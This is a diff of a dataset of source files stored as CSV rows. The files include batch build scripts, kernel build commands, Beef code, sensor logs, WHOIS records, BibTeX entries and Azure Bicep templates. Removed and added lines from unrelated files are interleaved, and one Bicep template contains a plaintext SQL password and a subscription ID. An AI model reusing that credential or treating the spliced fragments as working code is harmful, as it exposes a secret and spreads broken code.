mongoose-auto-increment +","4856","0.4727874598383799","0.0","0.0016474464579901153" +"14477fcb36a6c98caf90337df47773f3a79dfe63","boilerplate.cmd",".cmd","Batchfile",":: Created by npm, please don't edit manually. +@IF EXIST ""%~dp0\node.exe"" ( + ""%~dp0\node.exe"" ""%~dp0\..\boilerplate\bin\boilerplate"" %* +) ELSE ( + node ""%~dp0\..\boilerplate\bin\boilerplate"" %* +)","4856","0.4727874598383799","0.0","0.0016474464579901153" +"010c7c2d9581c1f8061e2fa8b2c55b681e0968ca","build-sln.cmd",".cmd","Batchfile","@ECHO OFF +SETLOCAL ENABLEDELAYEDEXPANSION +PUSHD %~dp0.. +SET ROOT=%CD%\ + +SET BRANCH= +FOR /F USEBACKQ %%G IN (`git branch ^| grep \* ^| cut -d ' ' -f2`) DO ( SET BRANCH=%%G ) + + +SET CONFIGURATION= +IF ""!BRANCH:~0,7!"" EQU ""release"" ( + SET CONFIGURATION=Release +) ELSE IF ""!BRANCH:~0,6!"" EQU ""master"" ( + SET CONFIGURATION=Release +) ELSE ( + SET CONFIGURATION=Debug +) - [Import(""winmm.lib""), CLink, StdCall] - public static extern uint32 timeGetTime(); +SET PLATFORM=x86 +SET ROOT +IF ""%~dp1"" EQU ""!ROOT!"" ( + SET MSBUILD_PROPS=Configuration=%CONFIGURATION%;Platform=!PLATFORM! +) ELSE ( + SET MSBUILD_PROPS=Configuration=%CONFIGURATION%;Platform=!PLATFORM!;SolutionDir=!ROOT! +) - /*public const String cDllName = @""C:\proj\TestDLL2\x64\Debug\TestDLL2.dll""; - [","23","1.4375","0.0","0.0" -"023156de68d549bdb4f3645eab746a9caa437c34","IComponent.bf",".bf","Beef","using System; +CALL scripts\now BUILD_START +ECHO [ BUILD START ] %BUILD_START% ^> msbuild-%~nx1.%BUILD_START%.log +CALL scripts\msbuild ""%~nx1"" /p:!MSBUILD_PROPS! > msbuild-%~nx1.%BUILD_START%.log +CALL scripts\now BUILD_FINISH +ECHO [ BUILD FINISH ] %BUILD_FINISH% +POPD +ENDLOCAL","4856","0.4727874598383799","0.0","0.0016474464579901153" +"01165d64eb005e7ba3d86c1e8dbc5781a7ab71e4",".scsi_proc.o.cmd",".cmd","Batchfile","cmd_drivers/scsi/scsi_proc.o := arm-brcm-linux-uclibcgnueabi-gcc -Wp,-MD,drivers/scsi/.scsi_proc.o.d -nostdinc -isystem /home/mango/develop/am-toolchains/brcm-arm-sdk/hndtools-arm-linux-2.6.36-uclibc-4.5.3/bin/../lib/gcc/arm-brcm-linux-uclibcgnueabi/4.5.3/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/linux/linux-2.6.36/arch/arm/include -Iinclude -include include/generated/autoconf.h -D__KERNEL__ -mlittle-endian -Iarch/arm/mach-brcm-hnd/include -Iarch/arm/plat-brcm/include -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Wno-format-security -fno-delete-null-pointer-checks -I/home/mango/data/awrt-mango/src-rt-9.x/src/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/common/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/shared/bcmwifi/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/common/include -I/home/mango/data/awrt-mango/src-rt-9.x/src/co","4856","0.4727874598383799","0.0","0.0016474464579901153" +"00b224d24fc8f99d04c42c6a2a0298c4bbb5cff5",".built-in.o.cmd",".cmd","Batchfile","cmd_drivers/tty/ipwireless/built-in.o := rm -f drivers/tty/ipwireless/built-in.o; /home/rk3288-sdk/prebuilts/gcc/linux-x86/arm/arm-eabi-4.6/bin/arm-eabi-ar rcsD drivers/tty/ipwireless/built-in.o +","4856","0.4727874598383799","0.0","0.0016474464579901153" +"01a6b71d144e5f82b313cb83d1e0c79ffeea2a26","Matrix4x3.bf",".bf","Beef","/* +Copyright (c) 2006 - 2008 The Open Toolkit library. + +Permission is hereby granted, free of charge, to any person obtaining a copy of +this software and associated documentation files (the ""Software""), to deal in +the Software without restriction, including without limitation the rights to +use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies +of the Software, and to permit persons to whom the Software is furnished to do +so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISIN","17","1.0","0.0","0.0" +"11aa49276b2679a65ba2bc6bfbdceab9ab30a81a","Sprite.bf",".bf","Beef","using System; +using SDL2; +using System.IO; +using System.Text; +using System.Collections; +using MiniZ; -namespace ari.en +namespace Strawberry { - interface IComponent + public class Sprite { - uint32 GetId(); - uint32 GetBaseId(); + private enum Modes + { + Indexed = 1, + Grayscale = 2, + RGBA = 4, + } - static void AddComponentGeneral(World _world, ref EntityHandle _entity, ref ComponentHandle _cmp); - static ComponentHandle CreateComponentGeneral(); - static void DeleteComponentGeneral(ref ComponentHandle _cmp); - static void DisposeComponentGeneral(World _world, ref ComponentHandle _cmp); - } -} -","23","1.4375","0.0","0.0" -"1672ea31caf71d781f2bd00566af25b9025d7a0b","ProfilePanel.bf",".bf","Beef","using System; -using System.Collections; -using System.Text; -using System.Threading.Tasks; -using System.Diagnostics; -using Beefy; -using Beefy.widgets; -using Beefy.theme; -using Beefy.gfx; -using Beefy.theme.dark; -using Beefy.events; -using Beefy.utils; -using IDE.Debugger; - - -namespace IDE.ui -{ - class ProfilePanel : Panel - { - class ProfileListViewItem : DarkListViewItem + private enum Chunks { - public int32 mSelfSamples; - public int32 mChildSamples; + OldPaletteA = 0x0004, + OldPaletteB = 0x0011, + Layer = 0x2004, + Cel = 0x2005, + CelExtra = 0x2006, + Mask = 0x2016, + Path = 0x2017, + FrameTags = 0x2018, + Palette = 0x2019, + UserData = 0x2020, + Slice = 0x2022 + } - float ArrowCenterY - { - get - { - return DarkTheme.sUnitSize * 0.5f + GS!(4) + 1; - } - } + public readonly String Path; - protected override void DrawChildren(Graphics g, int itemStart, int itemEnd) - { - base.DrawChildren(g, itemStart, itemEnd); + public int Width { get; private set; } + public int Height { get; private set; } - if (mParentItem == null) - return; + private Frame[] frames; + private List layers; + private List tags; + private List slices; + private Modes mode; - float barWidth = (int)GS!(1.5f); + private this(String path) + { + Path = new String(path); + Load(); + } - let lastItem = mChildItems.Back; - if (!lastItem.mVisible) - return; + public ~this() + { + delete Path; + Unload(); + } - let parent = (DarkListView)mListView; - float absX = (mDepth - 1) * parent.mChildIndent + GS!(12); - if (absX >= parent.mColumns[0].mWidth) - return; + public Frame this[int index] + { + get => frames[index]; + } - us","23","1.4375","0.0","0.0" -"02f87327432d55cb265673fdafece8fc94138b3b","log_nuc11-36.wilab1.ilabt.iminds.be",".be","Berry","perl: warning: Setting locale failed. + private void Unload() + ","17","1.0","0.0","0.0" +"04aa30897532ecb9c3e0ad6097f7a55fb48d6b25","all.bf",".bf","Beef","SNHOME=/usr/local/snavigator +export SNHOME +suffix_path_with_dirlist PATH $SNHOME/bin +","17","1.0","0.0","0.0" +"124142eeee402db808a58f3b119699d0d18fc63b","snapshot.mag.no.sphere.Npol.6.Plen.100.Nlinks.20.D.15.la.6.phi_mag.0.05.999.bf",".bf","Beef","{particles {id pos type dip} + {0 -0.6346651285298357 -12.000977948299429 32.7489210979842 1 0.0 0.0 0.0} + {1 -1.2899497889443943 -12.128689317605463 33.542753080829364 1 0.0 0.0 -0.0} + {2 -0.49741279454160114 -11.62326327543871 34.086484700297774 1 0.0 -0.0 -0.0} + {3 0.3445324359274872 -11.183539777445738 33.81835220675781 1 0.0 0.0 0.0} + {4 0.9741145334591921 -10.537994172289334 33.416987355416815 1 0.0 -0.0 -0.0} + {5 0.41324370291246854 -10.845143899470312 32.50084917806978 1 -0.0 0.0 0.0} + {6 0.2993768245629416 -11.851366354172352 32.186013740267356 1 -0.0 -0.0 -0.0} + {7 1.0913566246811053 -12.185568434282825 31.695646909852442 1 -0.0 0.0 -0.0} + {8 1.2955836553379763 -11.197843665810087 31.630665756805215 1 -0.34749394047039717 2.2906204980637037 0.7951765182566368} + {9 1.2021634880933123 -11.03225013961686 30.614338452247086 1 -0.0 -0.0 0.0} + {10 1.4411533051317917 -10.782937374623316 29.655188621577835 1 0.0 0.0 0.0} + {11 1.6910051121833847 -10.099293068562591 30.28484828048429 1","17","1.0","0.0","0.0" +"00c7a099feba0ac4e242217fef88d033a132e627","snapshot.mag.no.sphere.Npol.6.Plen.100.Nlinks.20.D.15.la.5.phi_mag.0.05.999.bf",".bf","Beef","{particles {id pos type dip} + {0 13.744257679597414 -3.7814179290707486 22.871937932174152 1 0.0 0.0 -0.0} + {1 14.58759632771874 -3.7089329139054747 22.417023969212774 1 0.0 0.0 -0.0} + {2 14.266952527384724 -2.796620785053694 22.36209083082123 1 -0.0 -0.0 -0.0} + {3 15.293420846647008 -2.651122314389502 22.391755501458935 1 -0.0 0.0 -0.0} + {4 16.056666636760315 -3.221960783603288 21.95968502389473 1 -0.0 -0.0 0.0} + {5 16.695376145298784 -3.535989585855571 22.61346295751222 1 0.0 -0.0 0.0} + {6 17.134606104412534 -2.6019971899449494 22.73575039394287 1 0.0 -0.0 -0.0} + {7 18.01432007661625 -3.056318945012613 22.64114944624209 1 -0.0 0.0 -0.0} + {8 18.845329151921938 -3.6679627711014398 22.503373653431105 1 -0.0 0.0 -0.0} + {9 19.337999731279293 -3.390298803672003 23.350989356914972 1 -0.0 -0.0 -0.0} + {10 19.56691067004665 -3.0685663794770974 22.362624634823412 1 0.0 -0.0 0.0} + {11 20.278527389886467 -3.741011362000201 22.540455326013387 1 0.0 0.0 -0.0} + {12 20.713725719541838 -3.33535149310","17","1.0","0.0","0.0" +"048483c965a38facdcba73d2e08ba57e7ba0957a","log_nuc11-35.wilab1.ilabt.iminds.be",".be","Berry","perl: warning: Setting locale failed. perl: warning: Please check that your locale settings: LANGUAGE = (unset), LC_ALL = (unset), @@ -8053,15 +8437,56 @@ perl: warning: Please check that your locale settings: LANG = ""en_US.UTF-8"" are supported and installed on your system. perl: warning: Falling back to a fallback locale (""en_US.UTF-8""). -2018-03-20 20:39:44,202 - MainThread - SensorNodeFactory - INFO - cc2538-bsl.py -p /dev/ttyUSB0 -a 0x00202000 +2018-03-20 20:21:46,813 - SensorNodeFactory.create_nodes_auto() - INFO - cc2538-bsl.py -p /dev/ttyUSB0 -a 0x00202000 Opening port /dev/ttyUSB0, baud 500000 address 0x202000 Connecting to target... CC2538 PG2.0: 512KB Flash, 32KB SRAM, CCFG at 0x0027FFD4 -Primary IEEE Address: 00:12:4B:00:10:03:56:37 -2018-03-20 20:39:44,366 - MainThread - SensorNodeFactory - INFO - b'' -2018-03-20 20:39:44,366 - MainThread - SensorNodeFactory - INFO - Found Zoul on /dev/ttyUSB0 -2018-03","35","1.0606060606060606","0.0","0.0" -"0527d1c1a8d4ff3f04372ec1ed872ff3587f7a55","log_nuc11-2.wilab1.ilabt.iminds.be",".be","Berry","perl: warning: Setting locale failed. +Primary IEEE Address: 00:12:4B:00:10:03:56:64 +2018-03-20 20:21:46,975 - SensorNodeFactory.create_nodes_auto() - INFO - b'' +2018-03-20 20:21:46,976 - SensorNodeFactory.create_nodes_auto() - INFO - Found Zoul on","27","0.9","0.0","0.0" +"05183a0181151c335fe9253e54f91577becbf5d7","target0.be",".be","Berry","% .be Whois Server 4.0 +% +% (c) dns.be 2001-2004 (http://www.dns.be) +% +%- The WHOIS service offered by DNS and the access to the records in the DNS +%- WHOIS database are provided for information purposes only. It allows +%- persons to check whether a specific domain name is still available or not +%- and to obtain information related to the registration records of +%- existing domain names. +%- +%- DNS cannot, under any circumstances, be held liable where the stored +%- information would prove to be incomplete or inaccurate in any sense. +%- +%- By submitting a query you agree not to use the information made available +%- to: +%- - allow, enable or otherwise support the transmission of unsolicited, +%- commercial advertising or other solicitations whether via email or otherwise; +%- - target advertising in any possible way; +%- - to cause nuisance in any possible way to the domain name holders by sending +%- messages to them (whether by automated, electronic processes capable of +%- ","27","0.9","0.0","0.0" +"0c332f80cf239d5936800dabe923bde19e092e36","socialvi.be",".be","Berry","% .be Whois Server 4.0 +% +% (c) dns.be 2001-2004 (http://www.dns.be) +% +%- The WHOIS service offered by DNS and the access to the records in the DNS +%- WHOIS database are provided for information purposes only. It allows +%- persons to check whether a specific domain name is still available or not +%- and to obtain information related to the registration records of +%- existing domain names. +%- +%- DNS cannot, under any circumstances, be held liable where the stored +%- information would prove to be incomplete or inaccurate in any sense. +%- +%- By submitting a query you agree not to use the information made available +%- to: +%- - allow, enable or otherwise support the transmission of unsolicited, +%- commercial advertising or other solicitations whether via email or otherwise; +%- - target advertising in any possible way; +%- - to cause nuisance in any possible way to the domain name holders by sending +%- messages to them (whether by automated, electronic processes capable of +%- ","27","0.9","0.0","0.0" +"083bf72a5313d9bea3e60615f5b9b222926071c4","log_nuc11-12.wilab1.ilabt.iminds.be",".be","Berry","perl: warning: Setting locale failed. perl: warning: Please check that your locale settings: LANGUAGE = (unset), LC_ALL = (unset), @@ -8077,187 +8502,178 @@ perl: warning: Please check that your locale settings: LANG = ""en_US.UTF-8"" are supported and installed on your system. perl: warning: Falling back to a fallback locale (""en_US.UTF-8""). -2018-03-20 23:57:48,413 - SensorNodeFactory.create_nodes_auto() - INFO - cc2538-bsl.py -p /dev/ttyUSB0 -a 0x00202000 +2018-04-18 00:01:46,031 - SensorNodeFactory.create_nodes_auto() - INFO - cc2538-bsl.py -p /dev/ttyUSB0 -a 0x00202000 Opening port /dev/ttyUSB0, baud 500000 address 0x202000 Connecting to target... CC2538 PG2.0: 512KB Flash, 32KB SRAM, CCFG at 0x0027FFD4 -Primary IEEE Address: 00:12:4B:00:10:03:54:2E -2018-03-20 23:57:48,578 - SensorNodeFactory.create_nodes_auto() - INFO - b'' -2018-03-20 23:57:48,578 - SensorNodeFactory.create_nodes_auto() - INFO - Found Zoul on","35","1.0606060606060606","0.0","0.0" -"062ede88e561baf03f8c5ce5976fdc431b9fbb75","lemit.be",".be","Berry","lemit.be -","35","1.0606060606060606","0.0","0.0" -"0600ee90a7af811cc2de118aa47d79e2ad093407","N8C.BE",".be","Berry","9.0,25.0,4.552,4.652,4.525,4.549,0.0,-0.0029999999999992255 -9.0,24.0,4.552,4.552,4.456,4.518,0.0,-0.03399999999999981 -9.0,23.0,4.598,4.648,4.55,4.55,0.0,-0.04800000000000004 -9.0,21.0,4.823,4.823,4.652,4.723,0.0,-0.10000000000000053 -9.0,18.0,4.765,4.834,4.709,4.827,0.0,0.06200000000000028 -9.0,17.0,4.72,4.791,4.705,4.771,0.0,0.051000000000000156 -9.0,16.0,4.622,4.721,4.622,4.709,0.0,0.08699999999999974 -9.0,15.0,4.643,4.65,4.587,4.628,0.0,-0.01499999999999968 -9.0,14.0,4.552,4.644,4.546,4.642,0.0,0.09000000000000075 -9.0,11.0,4.581,4.581,4.537,4.555,0.0,-0.02600000000000069 -9.0,10.0,4.502,4.589,4.502,4.589,0.0,0.08700000000000063 -9.0,9.0,4.628,4.712,4.57,4.57,0.0,-0.05799999999999983 -9.0,8.0,4.473,4.578,4.473,4.578,0.0,0.10500000000000043 -9.0,7.0,4.727,4.734,4.48,4.485,0.0,-0.242 -9.0,4.0,4.926,4.926,4.716,4.716,0.0,-0.20999999999999996 -9.0,3.0,4.87,4.994,4.756,4.98,0.0,0.11000000000000032 -9.0,2.0,4.862,4.951,4.813,4.855,0.0,-0.006999999999999673 -9.0,1.0,4.936,4.936,4.82,4.874,0.0,-0.06200000","35","1.0606060606060606","0.0","0.0" -"05129aea7a205c7fc244d96e05b245511365ca6b","Effect.be",".be","Berry"," - - - - - - - - - - - - - - - - - - - - - - - - - - - ","35","1.0606060606060606","0.0","0.0" -"07c1ddba8e9f3dd6e715b3cb69389e4682c8c5c4","spde-tutorial.bib",".bib","BibTeX"," -@Article{Rueetal:2016, - author = {Rue, H. and Riebler, A. I. and S{\o}rbye, S. H. and -Illian, J. B. and Simpson, D. P. and Lindgren, F. K.}, - title = {Bayesian Computing with INLA: A Review}, - journal = {submited}, - year = {2016}, - OPTkey = {}, - OPTvolume = {}, - OPTnumber = {}, - OPTpages = {}, - OPTmonth = {}, - OPTnote = {}, - OPTannote = {} -} - -@Article{tobler:1970, - author = {Tobler, W. R.}, - title = {A Computer Movie Simulating Urban Growth -in the Detroid Region}, - journal = {Economic Geography}, - year = {1970}, - volume = {2}, - number = {46}, - pages = {234-240} -} - -@Book{cressie:1993, - author = {Cressie, N.}, - title = {Statistics for Spatial Data}, - publisher = {Wiley, N. Y.}, - year = {1993}, - note = {990p} -} - -@Booklet{abrahamsen:1997, - title = {A Review of Gaussian Random Fields and -Correlation Functions}, - author = {Abrahamsen, P.}, - howpublished = {Norwegian Compting Center report No. 917}, - year = {1997","1409","1.018063583815029","0.0","0.0" -"0da8eba4bc6bb5dc16073fa32c0d7da82ec0dec2","lee_icra_2019.bib",".bib","BibTeX","@InProceedings{lee:icra:2019, - author = {Lee, Youngeun and Kheddar, Abderrahmane and J.Kim, Young}, - title = {Continuous Signed Distance Computation for Polygonal Robots in 3D}, - booktitle = {IEEE International Conference on Robotics and Automation}, - year = {2019}, - pages = {01--07}, - address = {Montreal, Canada}, - month = {May 20-May 24}, - keywords = {Collision avoidance, Computational geometry, Humanoid Robots, Mobile robots}, - doi = {https://doi.org/10.1109/ICRA39644.2019.8975893}, - abstract = {We propose a novel method adaptive subdivision (AS) to evaluate the distance function for moving general polygonal models. The distance function can have a positive and a negative value, each of which corresponds to the Euclidean distance and penetration depth, respectively. In our approach, the distance between a pair of objects can be evaluated along any time interval of the object\textquotesingle s trajectory; therefore it is called \textquotedbllef","1409","1.018063583815029","0.0","0.0" -"0b4f42f5fbf000093a90c839120f6673abb57785","personalities.bib",".bib","BibTeX","@online{bigfive, -title = {Wat is De Big Five persoonlijkheidstheorie?}, -author = {Nieuwenhuis, M.A.}, -url = {http://123management.nl/0/040_mensen/a400_mensen_12_teamrol_big_five.html}, -urldate = {2010} -}, -@online{introverie, -title = {Wat is introversie?}, -author = {Sluys, E.}, -url = {http://www.elinesluyscoaching.nl/wat-is-introversie/}, -urldate = {2016} -}, -@online{extraversie, -title = {Extraverte en introverte mensen en hun taalgebruik}, -author = {Beukeboom, C.}, -url = {http://tekstblad.nl/artikel/extraverte-en-introverte-mensen-en-hun-taalgebruik}, -urldate = {2011} -}, -@online{altruisme, -title = {‘Empathie is altruïsme met een snufje egoïsme’}, -author = {Overgaauw, S.}, -url = {http://www.fsw.leidenuniv.nl/psychologie/nieuws/empathie-is-altruisme-met-een-snufje-egoisme.html}, -urldate = {03-03-2015} -}, -@online{egoism, -title = {Egoism}, -author = {Moseley, A.}, -url = {http://www","1409","1.018063583815029","0.0","0.0" -"01a02caf92ec4192763a8b2f7e03186cdc9312fe","ftdb.bib",".bib","BibTeX","@article{journals/ftdb/IlyasC15, - title = {Trends in Cleaning Relational Data: Consistency and Deduplication}, - pages = {281-393}, - year = {2015}, - volume = {5}, - journal = {Foundations and Trends in Databases}, - number = {4}, - doi = {10.1561/1900000045}, - author = {Ihab F. Ilyas and Xu Chu} -} -@article{journals/ftdb/CheneyCT09, - title = {Provenance in Databases: Why, How, and Where}, - pages = {379-474}, - year = {2009}, - volume = {1}, - journal = {Foundations and Trends in Databases}, - number = {4}, - doi = {10.1561/1900000006}, - author = {James Cheney and Laura Chiticariu and Wang Chiew Tan} -} -@article{journals/ftdb/ChirkovaY12, - title = {Materialized Views}, - pages = {295-405}, - year = {2012}, - volume = {4}, - journal = {Foundations and Trends in Databases}, - number = {4}, - doi = {10.1561/1900000020}, - author = {Rada Chirkova and Jun Yang} -} -@article{journals/ftdb/LabrinidisLXX09, - title = {Caching and Materialization for Web Databases}, - pages = {169-266}, - ye","1409","1.018063583815029","0.0","0.0" -"146b65baafdc28810ef841d3a5d972ed6d82c34b","steerable_filters.bib",".bib","BibTeX","@ARTICLE{93808, -author={Freeman, W.T. and Adelson, E.H.}, -journal={Pattern Analysis and Machine Intelligence, IEEE Transactions on}, -title={The design and use of steerable filters}, -year={1991}, -volume={13}, -number={9}, -pages={891-906}, -keywords={adaptive filters;filtering and prediction theory;picture processing;adaptive filtering;design;edge detection;picture processing;shape from shading;steerable filters;Adaptive control;Adaptive filters;Image analysis;Image edge detection;Image motion analysis;Image processing;Image sequence analysis;Image texture analysis;Nonlinear filters;Shape}, -doi={10.1109/34.93808}, -ISSN={0162-8828}, -month={Sep},}","1409","1.018063583815029","0.0","0.0" +Primary IEEE Address: 00:12:4B:00:10:03:54:20 +2018-04-18 00:01:46,195 - SensorNodeFactory.create_nodes_auto() - INFO - b'' +2018-04-18 00:01:46,195 - SensorNodeFactory.create_nodes_auto() - INFO - Found Zoul on","27","0.9","0.0","0.0" +"0f638e0be90606d4aa902192ed2bc36be1585952","logfile_www.bozar.be",".be","Berry","--2020-03-02 00:19:31-- http://www.bozar.be/file/2706/download +Resolving www.bozar.be (www.bozar.be)... 5.135.115.84 +Connecting to www.bozar.be (www.bozar.be)|5.135.115.84|:80... connected. +HTTP request sent, awaiting response... 301 Moved Permanently +Location: https://www.bozar.be/file/2706/download [following] +--2020-03-02 00:19:31-- https://www.bozar.be/file/2706/download +Connecting to www.bozar.be (www.bozar.be)|5.135.115.84|:443... connected. +HTTP request sent, awaiting response... 200 OK +Length: 7532575 (7.2M) [application/pdf] +Saving to: ‘/dev/null’ + + 0K .......... .......... .......... .......... .......... 0% 13.0M 5s + 50K .......... .......... .......... .......... .......... 1% 25.3M 3s + 100K .......... .......... .......... .......... .......... 2% 31.5M 3s + 150K .......... .......... .......... .......... .......... 2% 29.5M 3s + 200K .......... .......... .......... .......... .......... 3% 110M 2s + 250K .......... .......... .......... .......... ..","27","0.9","0.0","0.0" +"0a01d4dba420805efcf00807eafc7b6da0fb4983","cite.bib",".bib","BibTeX","@article{MELE2020102193, + author = {Ida Mele and Nicola Tonellotto and Ophir Frieder and Raffaele Perego}, + doi = {https://doi.org/10.1016/j.ipm.2019.102193}, + issn = {0306-4573}, + journal = {Information Processing & Management}, + number = {3}, + pages = {102193}, + title = {Topical result caching in web search engines}, + volume = {57}, + year = {2020} +} + +","1405","1.0007122507122508","0.0","0.0" +"132221854392e72c9af050a4753a1216730d329c","10.10022Fima.10007.bib",".bib","BibTeX","@article {IMA:IMA10007, +author = {Gregor, Jens and Rannou, Fernando R.}, +title = {Three-dimensional support function estimation and application for projection magnetic resonance imaging}, +journal = {International Journal of Imaging Systems and Technology}, +volume = {12}, +number = {1}, +publisher = {John Wiley & Sons, Inc.}, +issn = {1098-1098}, +url = {http://dx.doi.org/10.1002/ima.10007}, +doi = {10.1002/ima.10007}, +pages = {43--50}, +keywords = {support function, projection imaging, magnetic resonance imaging}, +year = {2002}, +} +","1405","1.0007122507122508","0.0","0.0" +"00e57feb494acab731754e1c0ff67ebf83640204","paperBib.bib",".bib","BibTeX","@article{Shannon, + title=""A mathematical theory of communication"", + author=""Shannon, Claude Elwood"", + journal=""ACM SIGMOBILE Mobile Computing and Communications Review"", + volume=""5"", + number=""1"", + pages=""3--55"", + year=""1948"", + publisher=""ACM"" +} + +@book{Jaynesfull, + title=""ET Jaynes: Papers on probability, statistics, and statistical physics"", + author=""Jaynes, Edwin Thompson"", + volume=""50"", + year=""1989"", + publisher=""Springer"" +} + +@article{Jaynes3, + title=""Information theory and statistical mechanics"", + author=""Jaynes, Edwin T"", + journal=""Physical review"", + volume=""106"", + number=""4"", + pages=""620"", + year=""1957"", + publisher=""APS"" +} + +@article{Inadequacy, + title=""Conceptual inadequacy of the Shannon information in quantum measurements"", + author=""Brukner, vaslav and Zeilinger, Anton"", + journal=""Physical Review A"", + volume=""63"", + number=""2"", + pages=""022113"", + year=""2001"", + publisher=""APS"" +} + +@article{Tsallis2, + title=""Possib","1405","1.0007122507122508","0.0","0.0" +"0fa29c6a16879a3afbf317adc3c85f656f039ea6","BEP-Comparison.bib",".bib","BibTeX","Automatically generated by Mendeley Desktop 1.17.13 +Any changes to this file will be lost if it is regenerated by Mendeley. + +BibTeX export options can be customized via Options -> BibTeX in Mendeley Desktop + +@article{Colless1999, +author = {Colless, M and {The 2DF Galaxy Redshift Survey Team} and Ellis, R and Bland-Hawthorn, J and Cannon, R and Cole, S and Collins, C and Couch, W and Dalton, G and Driver, S and Efstathiou, G and Folkes, S and Frenk, C and Glazebrook, K and Kaiser, N and Lahav, O and Lewis, I and Lumsden, S and Maddox, S and Peacock, J and Peterson, B and Price, I and Sutherland, W and Taylor, K}, +file = {:C$\backslash$:/Users/Jaap/AppData/Local/Mendeley Ltd./Mendeley Desktop/Downloaded/Colless et al. - 1999 - The 2dF Galaxy Redshift Survey.pdf:pdf}, +journal = {Looking Deep in the Southern Sky}, +keywords = {clusters,cosmology,distances and redshifts,galaxies,general,large-scale structure of universe,observations,surveys}, +pages = {9}, +title = {{The 2dF Galaxy Redshift Su","1405","1.0007122507122508","0.0","0.0" +"0a1c889cbf643e40f8654717b36d5bb580dfa125","katselis-12-c.bib",".bib","BibTeX","@inproceedings{Katselis:12c, + address = {Maui, Hw, USA}, + author = {D. Katselis and C.R. Rojas and H. Hjalmarsson and M. Bengtsson}, + booktitle = {Proceedings 51th IEEE Conference on Decision and Control}, + pages = {}, + title = {A Chernoff Relaxation on the Problem of Application-Oriented Finite Sample Experiment Design}, + year = {2012} +} + +","1405","1.0007122507122508","0.0","0.0" +"1893c8bda01b999f2a00e5726ca0c2ce316b3e6a","role-discovery.bicep",".bicep","Bicep","param location string +param utcValue string = utcNow() +param roleName string +param uamiId string +param storageAccountName string +param storageAccountId string +param storageAccountApiVersion string +resource role_def_discovery_script 'Microsoft.Resources/deploymentScripts@2020-10-01' = { + name: 'roleDefinitionDiscovery' + location: location + identity: { + type: 'UserAssigned' + userAssignedIdentities: { + '${uamiId}': {} + } + } + kind: 'AzurePowerShell' + properties: { + forceUpdateTag: utcValue + azPowerShellVersion: '3.0' + timeout: 'PT10M' + storageAccountSettings: { + storageAccountName: storageAccountName + storageAccountKey: listKeys(storageAccountId, storageAccountApiVersion).keys[0].value + } + arguments: '-roleName \'${roleName}\'' + scriptContent: ''' + param($roleName) + $role = Get-AzRoleDefinition -Name $roleName + if ($role) { + $roleExists = $true + $existingRoleId = $role.id + $existingScopes = $role.AssignableScopes -j","15","0.8333333333333334","0.0","0.0" +"0178a2e9a977c2bb2d7d58f3bffd3288fa9693f3","CreateSqlVirtualMachineTemplate.bicep",".bicep","Bicep","param sqlConnectivityType string = 'Public' +param sqlPortNumber int = 41433 +param sqlStorageWorkloadType string = 'DW' +param sqlStorageDisksConfigurationType string = 'NEW' +param sqlAutopatchingDayOfWeek string = 'Sunday' +param sqlAutopatchingStartHour int = 2 +param sqlAutopatchingWindowDuration int = 60 +param sqlAuthenticationLogin string = 'tSQLt' +param sqlAuthenticationPassword string = 'sdlfksdlkfjlsdkjf39939^' +param newVMName string = 'V1052sql2014sp3' +param newVMRID string = '/subscriptions/58c04a99-5b92-410c-9e41-10262f68ca80/resourceGroups/tSQLtCI_DevTestLab_20200318_1052-V1052sql2014sp3-155797/providers/Microsoft.Compute/virtualMachines/V1052sql2014sp3' + +resource newVMName_resource 'Microsoft.SqlVirtualMachine/SqlVirtualMachines@2017-03-01-preview' = { + name: newVMName + location: resourceGroup().location + properties: { + virtualMachineResourceId: newVMRID + sqlManagement: 'Full' + sqlServerLicenseType: 'PAYG' + autoPatchingSettings: { + enable: true + dayOfW","15","0.8333333333333334","0.0","0.0" "0302c9ce28179816d3987a1c40eab93ba586da64","main.syntax.bicep",".bicep","Bicep","/* This is a block comment. */ @@ -8294,683 +8710,713 @@ param myBool bool // parameters with default value //@[32:34) NoOpDeclarationSyntax -//@[32:34) NewLine |\r","15","2.142857142857143","0.0","0.0" -"0f3e7d3ad5343603b02878215ba49bc7ad7ec3fe","dps.bicep",".bicep","Bicep","@minLength(3) -@maxLength(64) -param name string - -@secure() -@description('The connection string of the IoT Hub to link to this DPS instance') -param iotHubConnectionString string - -resource dps 'Microsoft.Devices/provisioningServices@2020-03-01' = { - name: name - location: resourceGroup().location - sku: { - name: 'S1' - } - properties: { - iotHubs: [ - { - connectionString: iotHubConnectionString - location: resourceGroup().location - } - ] +//@[32:34) NewLine |\r","15","0.8333333333333334","0.0","0.0" +"0626b1c98f71ff55a11319af9b963be65e908326","comments.bicep",".bicep","Bicep","resource test 'Microsoft.AAD/domainServices@2021-03-01' = { + name: 'asdfsdf' + // this is a comment + properties: {/*comment*/ + domainConfigurationType/*comment*/:/*comment*/'as//notacomment!d/* also not a comment */fsdf'// test!/* + /* multi + line + comment */ domainName: /* + asdf*/'test' + // comment } } +","15","0.8333333333333334","0.0","0.0" +"0122c35d7153e2bcdc8d0363df15ecc1abe50ecc","main.syntax.bicep",".bicep","Bicep","targetScope='tenant' +//@[00:127) ProgramSyntax +//@[00:020) ├─TargetScopeSyntax +//@[00:011) | ├─Token(Identifier) |targetScope| +//@[11:012) | ├─Token(Assignment) |=| +//@[12:020) | └─StringSyntax +//@[12:020) | └─Token(StringComplete) |'tenant'| +//@[20:022) ├─Token(NewLine) |\n\n| + +var deploymentLocation = deployment().location +//@[00:046) ├─VariableDeclarationSyntax +//@[00:003) | ├─Token(Identifier) |var| +//@[04:022) | ├─IdentifierSyntax 